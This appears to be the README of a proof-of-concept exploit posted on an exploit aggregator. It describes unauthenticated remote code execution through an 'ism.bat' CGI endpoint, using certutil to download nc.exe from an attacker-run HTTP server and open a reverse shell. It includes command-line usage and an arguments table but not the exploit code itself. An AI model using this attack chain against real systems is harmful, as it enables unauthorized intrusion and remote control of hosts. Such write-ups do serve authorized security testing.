Share
## https://sploitus.com/exploit?id=C85D6B10-6FA1-5BE2-89D8-AE3D912689D7
# ISM.bat RCE Exploit
PoC script for unauthenticated Remote Code Execution via `ism.bat` CGI endpoint.
Delivers `nc.exe` to the target using `certutil` and triggers a reverse shell.
## Requirements
```bash
pip install requests
```
## Usage
```bash
python3 exploit.py \
--host \
--port \
--server-ip \
--server-port \
--nc-ip \
--nc-port
```
Adicionalmente:
```bash
Cambiar el valor de ism.bat al directorio explotable.
```
## Arguments
| Argument | Required | Default | Description |
|-----------------|----------|---------|------------------------------------|
| `--host` | โ
| โ | Target IP address |
| `--port` | โ | 8080 | Target port |
| `--server-ip` | โ
| โ | IP serving `nc.exe` via HTTP |
| `--server-port` | โ | 80 | Port of the HTTP server |
| `--nc-ip` | โ
| โ | Netcat listener IP |
| `--nc-port` | โ
| โ | Netcat listener port |
## Disclaimer
For authorized security testing and educational purposes only.